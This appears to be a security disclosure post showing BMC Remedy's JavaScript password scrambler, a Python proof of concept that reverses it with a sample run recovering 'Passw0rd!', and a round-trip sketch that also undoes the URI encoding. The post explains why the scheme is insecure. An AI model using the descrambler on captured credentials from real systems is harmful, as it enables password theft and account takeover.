This is a very weak cipher that is easily decoded, so it provides no real protection for your passwords. Ensure your web application is served only over HTTPS to protect your password, and do not rely on this functionality.

    // Scrambles passwords using simple cipher algorithm
    function getScrambledPassword(pwd) {
        var cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm'];
        var result = "";
        if (pwd == null)
            pwd = "";
        pwd = encodeURIComponent(pwd);
        //alert("encoded password: " + pwd);
        for (var i = 0; i < pwd.length; i++) {
            var cc = pwd.charCodeAt(i);
            result += cipher[Math.floor(cc/16)] + cipher[cc%16];
        }
        //alert("scrambled password: " + result);
        return result;
    }

The following proof of concept reverses the cipher:
password.py
    #!/usr/bin/python
    import sys

    if len(sys.argv) != 2:
        print("# BMC Remedy Password Descrambler")
        print("# Author: Meatballs")
        print("# Usage: ./password.py ciphertext")
    else:
        cipherText = sys.argv[1]
        print("CipherText: " + cipherText)
        # Substitution table: a letter's position in the string is its 4-bit value
        cipher = 'kszhxbpjvcgfqntm'
        plainText = "PlainText: "
        i = 0
        # Each pair of letters encodes one character: high nibble, then low nibble
        while i < len(cipherText):
            x = cipher.index(cipherText[i]) * 16
            i += 1
            y = cipher.index(cipherText[i])
            z = x + y
            plainText += chr(z)
            i += 1
        print(plainText)
root@bt:/root/# ./password.py bkpsjhjhjjhkjzpxzs
CipherText: bkpsjhjhjjhkjzpxzs
PlainText: Passw0rd!
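As an added example (not code from the original post), the Python 3 sketch below carries the round trip through, including the percent-decoding that `encodeURIComponent` makes necessary for passwords containing spaces, symbols or non-ASCII characters. The function names `scramble` and `descramble` and the sample passwords other than the one shown above are assumptions made for illustration; the point is that the scheme is a keyless, fully reversible encoding.

```python
from urllib.parse import quote, unquote

# Substitution table from getScrambledPassword(): index = 4-bit value.
CIPHER = "kszhxbpjvcgfqntm"
# Punctuation that encodeURIComponent() leaves unescaped (besides letters/digits).
URI_SAFE = "-_.!~*'()"


def scramble(password):
    """Mirror of the JavaScript: percent-encode, then map each nibble to a letter."""
    encoded = quote(password, safe=URI_SAFE)
    return "".join(CIPHER[ord(c) >> 4] + CIPHER[ord(c) & 0x0F] for c in encoded)


def descramble(ciphertext):
    """Invert scramble(), including the encodeURIComponent() step."""
    if len(ciphertext) % 2:
        raise ValueError("scrambled text must have an even number of letters")
    chars = []
    for i in range(0, len(ciphertext), 2):
        try:
            high = CIPHER.index(ciphertext[i])
            low = CIPHER.index(ciphertext[i + 1])
        except ValueError:
            raise ValueError("letter outside the 16-letter table at offset %d" % i) from None
        chars.append(chr(high * 16 + low))
    # Undo the percent-encoding; reject byte sequences that are not valid UTF-8.
    return unquote("".join(chars), errors="strict")


if __name__ == "__main__":
    # Constructed sample passwords, plus the one from the session above.
    for sample in ("Passw0rd!", "a b", "p@ss w\u00f6rd"):
        scrambled = scramble(sample)
        print("%r -> %s -> %r" % (sample, scrambled, descramble(scrambled)))
```

Because no secret key is involved, anyone who can read the scrambled value can recover the password, which is why transport protection has to come from HTTPS.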
Read more:
http://myitpath.blogspot.co.uk/2010/09/reversing-remedy-passwords.html
It misses reversing the encodeURIComponent... (urllib.unquote seems suitable...)
But it's a start...